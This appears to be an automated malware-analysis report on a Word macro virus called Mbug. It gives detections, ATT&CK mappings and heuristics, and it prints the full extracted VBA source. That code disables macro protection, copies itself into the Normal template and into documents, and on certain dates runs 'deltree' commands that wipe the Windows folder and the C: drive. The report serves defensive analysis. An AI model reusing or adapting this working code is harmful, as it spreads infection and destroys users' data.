MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1490 Inhibit System Recovery
The sample contains VBA macros that execute upon opening or execution. The AutoExec subroutine contains calls to 'Shell "deltree /y c:\windows", vbHide' and 'Shell "deltree /y c:\*.*", vbHide', indicating an attempt to delete local files and inhibit system recovery. The AutoNew and AutoOpen subroutines attempt to copy the 'Mbug' macro and 'UserForm1' to the Normal template, suggesting an effort to establish persistence.
Heuristics 6
-
ClamAV: Doc.Trojan.Mbug-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mbug-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "deltree /y c:\windows", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5556 bytes |
SHA-256: 0e88885832b7d45dba881f91635410074d8ca68f95056463a369f81dc8a991dc |
|||
|
Detection
ClamAV:
Win.Trojan.DelTree-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Mbug"
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo errorAE
If Day(Now()) = "21" Or Day(Now()) = "25" Then
UserForm1.Show
Shell "deltree /y c:\windows", vbHide
Shell "deltree /y c:\*.*", vbHide
End If
errorAE:
End Sub
Sub AutoNew()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorAN
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
With Dialogs(wdDialogFileSummaryInfo)
.Subject = "You Have been infected by the Alliance 98"
.Execute
End With
ErrorAN:
End Sub
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorAO
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0) = "Mbug" Then
bInstalled = -1
End If
Next i
If Not bInstalled Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
For a = 1 To 10
StatusBar = "Microsoft"
Next a
Else
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
End If
ErrorAO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFSA
If Day(Now()) = "21" Or Day(Now()) = "25" Then
UserForm1.Show
Shell "deltree /y c:\windows", vbMinimizedFocus
Shell "deltree /y c:\*.*", vbMinimizedFocus
End If
Dialogs(wdDialogFileSaveAs).Show
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
ErrorFSA:
If (ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate) Then
ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
End If
End Sub
Sub FilePrint()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFP
InsertPayload
Dialogs(wdDialogFilePrint).Show
ErrorFP:
End Sub
Sub FilePrintDefault()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFPD
InsertPayload
ActiveDocument.PrintOut
ErrorFPD:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFT
ErrorFT:
End Sub
Sub InsertPayload()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorIP
Dim WPrint$, Adding
WPrint$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "NbrePrint", "Nuclear98.ini")
Adding = WordBasic.Val(WPrint$) + 1
WordBasic.SetPrivateProfileString "Microsoft Word", "NbrePrint", Str(Adding), "Nuclear98.ini"
WPrint$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "NbrePrint", "Nuclear98.ini")
If WPrint$ = 12 Then
Selection.EndKey Unit:=wdLine
Selection.TypeParagraph
Selection.TypeText Text:="bug"
Selection.TypeParagraph
Selection.TypeParagraph
Selection.TypeText Text:="bug"
Selection.HomeKey Unit:=wdLine
Selection.EndKey Unit:=wdLine, Extend:=wdExtend
Selection.Font.Bold = wdToggle
WordBasic.SetPrivateProfileString "Microsoft Word", "NbrePrint", "1", "Nuclear98.ini"
End If
ErrorIP:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorTM
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorVVBC
ErrorVVBC:
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{7C541D26-BB10-11BD-B107-444553540000}{7C541D0A-BB10-11BD-B107-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
MsgBox "My name is Macrobug", vbInformation, "Information Box"
End Sub
Private Sub TextBox1_Change()
MsgBox "Don't change my name", vbInformation, "!!!"
End Sub
Private Sub UserForm_Initialize()
TextBox1.Text = "MacroBug"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.